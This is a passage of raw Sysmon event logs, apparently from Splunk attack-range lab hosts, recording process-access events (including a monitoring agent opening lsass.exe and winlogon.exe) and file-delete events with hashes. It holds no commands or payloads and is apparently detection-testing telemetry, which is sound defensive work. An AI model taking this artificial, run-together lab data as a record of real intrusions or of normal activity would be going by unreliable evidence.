Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018747Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:22.589{E5A8D418-DC44-63C7-1C00-00000000B002}20203052C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132003D0) 10341000x800000000000000018746Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:22.575{E5A8D418-DC44-63C7-1C00-00000000B002}20203052C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132003D0) 10341000x800000000000000018745Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:22.566{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018744Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:22.563{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 23542300x800000000000000018743Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:22.064{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E75C6431E02B25C643FA26B2FDEDC8B6,SHA256=69E27C729B40FDB683A626D51C5BEFD8C71FE5F0DCA44E13D63D7293BF4C8234,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000047445Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:22.938{FE4C2B44-E64B-63C7-8806-00000000AF02}5560ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeC:\Users\Administrator\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journalMD5=27A0C363631D0FD569708CA87F3B24AA,SHA256=6A4C7877834432179F1542EBA68EB985D708C55DDCE8FCA1E16D57D568EA216B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047444Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:22.732{FE4C2B44-E64B-63C7-8806-00000000AF02}5560ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeC:\Users\Administrator\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalMD5=6AAD5FFFD34EA5BDD2DD7375F10BCC39,SHA256=16D89DB5D22A64508D80D34CFB7B2CC88B8E01B4616EA81E4633FAB47502BF6F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047443Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:22.675{FE4C2B44-E64B-63C7-8806-00000000AF02}5560ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeC:\Users\Administrator\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalMD5=96F07F68BEE1CE93E452598022906B1E,SHA256=030540CD7929298FB85B2A7A88A660F443233484F04700F72150C8E1322C1EC5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047442Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:22.656{FE4C2B44-E64B-63C7-8806-00000000AF02}5560ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeC:\Users\Administrator\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalMD5=C9EBF2E32C546BB7E1BFE6D2F5AE909D,SHA256=28B4E4ADC9B67C4FDA2CAD82E0A9543CA032153B3218942A5E8EBFD2F5B27EF0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047441Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:22.636{FE4C2B44-E64B-63C7-8806-00000000AF02}5560ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeC:\Users\Administrator\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalMD5=034D38DD992399CD132BA133909FDCC1,SHA256=92545EA7479BD9D0B1E602E43A883F9821BE471A1FAD5E4CB62A60609361CF6D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047440Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:22.621{FE4C2B44-E64A-63C7-8706-00000000AF02}1400ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeC:\Users\Administrator\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crlMD5=51D5C7EB1B08D1810675452865D6173F,SHA256=4E48AED266111DBD66CBD28ED05026061634911C4362E15EA660094FD0F58E3F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047439Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:22.605{FE4C2B44-E64B-63C7-8806-00000000AF02}5560ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeC:\Users\Administrator\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalMD5=90E323EFEC5C4BA78A886AAC3978DD9B,SHA256=8E36E00C5B619B10CFEB120DB88C576C30D6882AA4092C06C01F672AAA62C6AF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000047438Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:22.285{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E65C-63C7-9106-00000000AF02}5072C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000047437Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:22.285{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E65C-63C7-9106-00000000AF02}5072C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000047436Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:22.285{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E65C-63C7-9106-00000000AF02}5072C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000047435Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:22.095{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047434Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:22.094{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000018776Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:23.600{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14BCEE31B854A462E090CC525BBC60E8,SHA256=801C742ED64C35A58886DEA77DA12F17AD13E2E5408D61D35F10BC2788D164D9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000047493Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.965{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002688C:\Windows\Explorer.EXE{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\NPSMDesktopProvider.dll+1be4a|C:\Windows\System32\NPSMDesktopProvider.dll+1226e|C:\Windows\System32\NPSMDesktopProvider.dll+12835|C:\Windows\System32\NPSMDesktopProvider.dll+67dc|C:\Windows\System32\TwinUI.dll+7bfb8|C:\Windows\System32\TwinUI.dll+7559d|C:\Windows\System32\TwinUI.dll+75173|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047492Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.965{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047491Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.965{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047490Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.965{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047489Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.965{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006016C:\Windows\Explorer.EXE{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c437|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047488Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.965{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006016C:\Windows\Explorer.EXE{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c437|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047487Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.965{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006016C:\Windows\Explorer.EXE{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c437|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047486Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.965{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006016C:\Windows\Explorer.EXE{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c437|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047485Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.917{FE4C2B44-DDF7-63C7-B604-00000000AF02}37882252C:\Windows\system32\taskhostw.exe{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d742|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047484Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.917{FE4C2B44-DDF7-63C7-B604-00000000AF02}37882252C:\Windows\system32\taskhostw.exe{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d742|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047483Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.917{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8ab30|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047482Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.917{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+1078f0|C:\Windows\System32\SHELL32.dll+8aaec|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047481Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.917{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8aac0|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047480Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.917{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\TwinUI.dll+12ccb9|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000047479Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 